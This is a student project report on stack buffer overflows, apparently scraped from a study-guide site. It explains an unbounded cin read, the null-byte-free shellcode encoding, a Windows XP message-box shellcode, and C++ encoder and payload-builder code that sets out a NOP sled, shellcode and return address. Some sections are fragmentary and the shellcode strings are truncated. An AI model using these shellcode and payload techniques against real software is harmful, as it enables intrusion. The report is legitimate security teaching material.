This report is for a final year project to complete a degree in Computer Science. It emphasises applications of computer science. It was supervised by Dr. Abhisri Yashwant at Bengal Engineering and Science University. Its main points are: Buffer, Overflows, Literature, Review, Register, Memory, Addressing, Architecture, Experimenting, Hardware
Typology: Study Guides, Projects, Research
For this project the following schedule was adopted and is still being followed:

Time line               Activities
6th mid - 6th final     Selection of this project.
6th final - 7th mid     Literature review and performing a simple buffer overflow locally.
7th mid - 7th final     Literature review and performing a complex buffer overflow locally.
7th final - 8th final   Literature review and performing a complex buffer overflow remotely.
A great problem in the field of software development is being faced by software developers, and that is buffer overflow. Due to buffer overflows a large number of software products have lost their security. So in this project what I am going to do is develop a tool that will help developers by finding buffer overflows (on a small scale). For this tool, first I am going to learn different aspects of buffer overflows and then make a tool that simulates me. So I am hopeful that at the end of this project I will be capable of testing different software for buffer overflow vulnerability, and at most a tool will be developed that is capable of performing tests for buffer overflow.
an increasing or decreasing rate. One factor may be that it is increasingly difficult to define and document vulnerabilities.
To understand why buffer overflows deserve attention compared with other vulnerabilities, a few entries from the very long list of buffer overflow advisories are given at the following URLs:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101512-
http://seer.support.veritas.com/docs/279553.htm
http://www.derkeiler.com/Mailing-Lists/Securiteam/2004-10/0063.html
http://research.eeye.com/html/advisories/published/AD20031111.html
http://xforce.iss.net/xforce/alerts/id/
http://www.nsfocus.com/en/advisories/0608.html
http://www.symantec.com/security_response/vulnerability.jsp?bid=2002.02.
http://marc.info/?l=bugtraq&m=106859247713009&w=
http://securityresponse.symantec.com/avcenter/security/Content/6122.html
http://securityresponse.symantec.com/avcenter/security/Content/10708.html
http://research.eeye.com/html/advisories/published/AD20060421.html
http://lwn.net/Articles/151617/
http://artofhacking.com/tucops/hack/winnet/live/aoh_B06-4437.HTM
All the work done is in accordance with the time line. Previously a literature survey was performed and a simple local buffer overflow was conducted, in which illegal access to a program was gained. This was possible because the program used the input function "cin" from the C++ standard library. Reading with "cin" into a fixed-size character array performs no size check on the input (a limitation that only C++20 removed, and only for arrays of known size), so a string of any length can be entered and is written past the end of the buffer.
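The unbounded read described above, placed beside a bounded replacement, as an added example that is not code from the report. The 16-byte buffer and the 100-character input are constructed for this example.

```cpp
// Added example, not code from the report. It reproduces the unbounded
// "cin >> buffer" read the report blames for the overflow and places a
// bounded replacement beside it. The 16-byte buffer and the 100-character
// input are constructed for this example.
#include <cstring>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>

// Vulnerable form. Before C++20, operator>> into a char array stops only at
// whitespace, so a 100-character word writes 85 bytes past buf[]. (C++20
// limits the array overload to N-1 characters; a raw char* target was never
// bounded.) Not called below: running it on long input is undefined behaviour.
std::size_t read_unbounded(std::istream &in) {
    char buf[16];
    in >> buf;                         // no length check before C++20
    return std::strlen(buf);
}

// Hardened form: std::setw(N) caps the extraction at N-1 characters and the
// stream still appends the terminating NUL. Surplus input stays in the stream.
template <std::size_t N>
std::size_t read_bounded(std::istream &in, char (&buf)[N]) {
    in >> std::setw(static_cast<int>(N)) >> buf;
    return std::strlen(buf);
}

// Safer still: let std::string own the storage and bound any later copy.
std::string read_word(std::istream &in) {
    std::string word;
    in >> word;
    return word;
}

int main() {
    std::istringstream in(std::string(100, 'A'));   // constructed long input
    char buf[16];
    std::cout << read_bounded(in, buf) << " characters stored, "
              << read_word(in).size() << " left in the stream\n";   // 15 and 85
    return 0;
}
```

The check to make when auditing such code is whether the width is set before every extraction into a character array: setw applies to the next extraction only and is reset to zero afterwards.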
Understanding shellcode.
Making simple assembly code.
Making simple shellcode.
Making complex shellcode.
Using complex shellcode.
Making self-sustained shellcodes.
Shellcode is the name given to small pieces of machine code, usually written in assembly language, that are used to launch a shell, typically as a result of a buffer overflow. Shellcode is used as an exploit payload, giving the attacker, typically, command line access to a computer system with the privileges of the exploited process. Shellcode can be stored in a process's memory space and executed once the attacker gains control of the program counter through vulnerabilities such as stack- and heap-based buffer overflows or format string attacks. The methods of controlling the program counter vary between operating systems and processor architectures; they include, but are not limited to, overwriting the return address in a stack frame, overwriting exception handlers, and Windows shatter attacks. Because the shellcode is delivered as the numeric (machine code) form of its instructions, and is usually copied into the target as a C string that ends at the first 0x00 byte, it must not contain any "00" byte. This restriction is what makes writing shellcode difficult, and the instructions that have to be rewritten to avoid it grow to roughly three times their original size. A sample shellcode is shown below:
char shellcode[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a"
"\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d"
"\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4"
"\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04"
"\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe"
Figure 1, Assembly code with output.
As mentioned above, a shellcode cannot contain "00", so the assembly code above cannot be used as shellcode directly. Instead we modify it so that it can. To remove every "00", we add 1111111 (hex) to the immediate value and then subtract the same value again in the code; the required shellcode is produced that way. For example, for the first line: adding 1111111 to 401210 (both hex) gives 1512321, so
MOV EBX, 1512321
SUB EBX, 1111111
PUSH EBX
This is the same as simply pushing 401210, but the "00" bytes have been removed from the machine code representation, at the cost of the instruction growing to about three times its size (PUSH 401210 is 5 bytes; the MOV, SUB and PUSH together are 12). Now the completely transformed code is shown below with its results, from which the difference between plain assembly code and shellcode becomes clear:
Figure 2, Conversion to shell code.
To remove the "push 0" statement (whose immediate is itself a "00" byte), the ECX register was zeroed with XOR ECX, ECX, and ECX was then pushed instead of 0, which gives the same result with different code. A successful shellcode is obtained in this fashion: there is not a single "00" in the numeric representation of its instructions. To complete the transformation, we simply copy all of this and select only the numeric representation of the code. After selecting the numeric commands we get: BB2123510181EB1111110153E8A022A97733C951535351E8202FA
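The add/subtract rewriting above, and the reason it is needed (a C-string copy stops at the first 0x00), as a small encoder. This is an added example, not the report's code; the opcodes are the standard x86 encodings, the key 0x01111111 is the report's value, and the other immediates are constructed test inputs.

```cpp
// Added example, not code from the report: a small encoder for the
// add/subtract trick the report applies by hand. x86 opcodes used:
//   68 imm32     PUSH imm32          (5 bytes)
//   BB imm32     MOV EBX, imm32      (5 bytes)
//   81 EB imm32  SUB EBX, imm32      (6 bytes)
//   53           PUSH EBX            (1 byte)
// The key 0x01111111 is the report's value; other keys are tried only if it
// leaves a zero byte behind.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

using Bytes = std::vector<std::uint8_t>;

// Append a 32-bit immediate in little-endian order, as the CPU reads it.
static void put_imm32(Bytes &out, std::uint32_t v) {
    for (int i = 0; i < 4; ++i)
        out.push_back(static_cast<std::uint8_t>(v >> (8 * i)));
}

// True when none of the four bytes of v is 0x00.
bool imm_null_free(std::uint32_t v) {
    for (int i = 0; i < 4; ++i)
        if (((v >> (8 * i)) & 0xffu) == 0) return false;
    return true;
}

// Number of bytes strcpy() or argv delivery would copy: everything before
// the first 0x00. Equal to code.size() only if the shellcode is null-free.
std::size_t copied_length(const Bytes &code) {
    std::size_t n = 0;
    while (n < code.size() && code[n] != 0) ++n;
    return n;
}

// Direct form: PUSH imm32. Carries a 0x00 whenever the immediate does.
Bytes push_direct(std::uint32_t imm) {
    Bytes out{0x68};
    put_imm32(out, imm);
    return out;
}

// Null-free form: MOV EBX, imm+key ; SUB EBX, key ; PUSH EBX.
// The addition wraps modulo 2^32 exactly as the SUB will undo it.
Bytes push_nullfree(std::uint32_t imm, std::uint32_t key) {
    Bytes out{0xBB};
    put_imm32(out, imm + key);
    out.push_back(0x81);
    out.push_back(0xEB);
    put_imm32(out, key);
    out.push_back(0x53);
    return out;
}

// Pick a key such that both key and imm+key are null-free. The report's
// 0x01111111 is tried first, then other repeated-byte keys are stepped
// through. Returns 0 (never a valid key) if nothing works.
std::uint32_t find_key(std::uint32_t imm) {
    for (std::uint32_t k = 0x01111111u; ; k += 0x01010101u) {
        if (imm_null_free(k) && imm_null_free(imm + k)) return k;
        if (k + 0x01010101u < k) return 0;   // wrapped around: give up
    }
}

// Encode "PUSH imm" without any 0x00 byte, keeping the 5-byte direct form
// whenever the immediate already allows it.
Bytes encode_push(std::uint32_t imm) {
    if (imm_null_free(imm)) return push_direct(imm);
    std::uint32_t key = find_key(imm);
    if (key == 0) return Bytes{};        // caller must treat empty as failure
    return push_nullfree(imm, key);
}

int main() {
    // The report's first instruction, PUSH 401210, rewritten null-free.
    for (std::uint8_t b : encode_push(0x00401210u)) std::printf("%02X", b);
    std::printf("\n");   // BB2123510181EB1111110153
    return 0;
}
```

Running it on 0x00401210 reproduces the bytes BB2123510181EB1111110153 that the report's hex dump begins with; copied_length on the direct PUSH shows why that form is unusable, since a string copy would stop after four of its five bytes.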
Taking this address, we simply subtract the base address of "User32" from it, which leaves the function's offset inside the DLL: 28CAE. Because 28CAE itself contains a "00" byte, the final shellcode adds it back to the DLL base at run time with the same add/subtract trick (its bytes 05 BF 9D 13 01 / 2D 11 11 11 01 are ADD EAX, 1139DBF and SUB EAX, 1111111, and 1139DBF - 1111111 = 28CAE). Therefore the final shellcode that we can use is:
Figure 4, Complex shell code.
So the final shellcode that we got is:
\xBB\x21\x23\x51\x01\x81\xEB\x11\x11\x11\x01\x53\xE8\xE1\x6D\xDA\x77\x33\xC9\x51\x53\x53\x51\x05\xBF\x9D\x13\x01\x2D\x11\x11\x11\x01\xFF\xD
After making a complex shellcode that uses the same addressing as the Windows operating system, we write a C++ program that uses the shellcode to display a message box:
Figure 5, The C++ code that will run the shell code.
This C++ code, which carries the shellcode, runs it when the input for the variable var1 overflows the buffer and the instruction pointer is redirected to the memory location where the shellcode starts. For this purpose the following input is placed into var1:
This code performs the same task as the shellcodes above, with the difference that it is self-sufficient: it works out its own address and adjusts itself accordingly. At present this code is tested locally, though it is intended for a remote host. To simulate a scenario similar to a remote host, a program "cm.exe" calls a program "new.exe" and sends it data, and in our case that data contains this shellcode. The platform on which the programs run is Windows XP. The program that accepts the shellcode is:
Figure 7, Code of new.exe.
This program only takes an argument when it is invoked. All it does is display that input and store it in its internal buffer.
The code that sends the shellcode in its data is:
Figure 8, Code of cm.exe.
What we can see in the above code is that a lot of junk is sent along with the shellcode. This is because the buffer on the other side has a size of 84 bytes but our shellcode is very
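How the junk, the shellcode and the overwritten return address are laid out for an 84-byte stack buffer, as an added example that is not the report's cm.exe code. It assumes the classic 32-bit Windows XP frame (buffer, then saved EBP, then the return address, with no stack cookie and no ASLR); the 19 shellcode bytes are copied from the start of the report's final shellcode as constructed input, and the return address 0x11223344 is a placeholder, not a real address.

```cpp
// Added example, not code from the report: builds the input that cm.exe
// hands to new.exe, for a 32-bit stack frame laid out as
//   [ buffer (84 bytes) ][ saved EBP (4) ][ return address (4) ]
// which is the classic Windows XP x86 layout (no stack cookie, no ASLR).
// The 84-byte size is the report's; the shellcode bytes are the start of
// the report's final shellcode, copied here as constructed input; the
// return address 0x11223344 is a placeholder, not a real address.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

using Bytes = std::vector<std::uint8_t>;

const std::size_t kBufSize = 84;                 // new.exe's buffer
const std::size_t kRetOffset = kBufSize + 4;     // past the saved EBP

// Layout produced: [NOP sled][shellcode]['A' junk up to ret_offset][ret].
// The return address may point anywhere inside the sled, which is the
// reason for the sled: it absorbs small errors in the guessed address.
Bytes build_payload(const Bytes &shellcode, std::size_t buf_size,
                    std::uint32_t ret_addr, std::size_t sled_len) {
    std::size_t ret_offset = buf_size + 4;
    if (sled_len + shellcode.size() > ret_offset) return Bytes{};  // no room
    Bytes p(sled_len, 0x90);                       // NOP sled
    p.insert(p.end(), shellcode.begin(), shellcode.end());
    p.resize(ret_offset, 'A');                     // junk through the saved EBP
    for (int i = 0; i < 4; ++i)                    // little-endian return address
        p.push_back(static_cast<std::uint8_t>(ret_addr >> (8 * i)));
    return p;
}

// Index of the first 0x00 byte, or -1 if there is none. A C-string copy
// (strcpy, or the argv string cm.exe passes) stops there, so a zero in the
// low bytes of the return address leaves it half written. A zero only in
// its last byte is tolerated: strcpy writes that one as the terminator.
long first_null(const Bytes &p) {
    for (std::size_t i = 0; i < p.size(); ++i)
        if (p[i] == 0) return static_cast<long>(i);
    return -1;
}

// True when the whole return address survives a C-string copy.
bool ret_survives_strcpy(const Bytes &p, std::size_t ret_offset) {
    long z = first_null(p);
    return z == -1 || static_cast<std::size_t>(z) == ret_offset + 3;
}

int main() {
    const Bytes shellcode = {0xBB,0x21,0x23,0x51,0x01,0x81,0xEB,0x11,0x11,0x11,
                             0x01,0x53,0xE8,0xE1,0x6D,0xDA,0x77,0x33,0xC9};
    Bytes p = build_payload(shellcode, kBufSize, 0x11223344u, 16);
    std::printf("%zu bytes, return address at offset %zu, first null at %ld\n",
                p.size(), kRetOffset, first_null(p));   // 92 bytes, 88, -1
    return 0;
}
```

The same check explains why a stack address such as 0x0012FF30 can still be used as the return address when it is the last thing in the string (its single zero byte is the terminator strcpy writes anyway), whereas an address with a zero in a lower byte cannot.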
As scheduled, by the end of this semester a remote buffer overflow exploit will be written. At present the shellcode that will be sent has been made, because this is self-sufficient code and is capable of working remotely. The only thing left is making a remote connection and sending this code. For this purpose network programming will be studied and practised. With network programming this shellcode will be sent to a program containing a buffer overflow vulnerability. This is a tough job in such a short time, but I pray to Allah that he helps me through this project.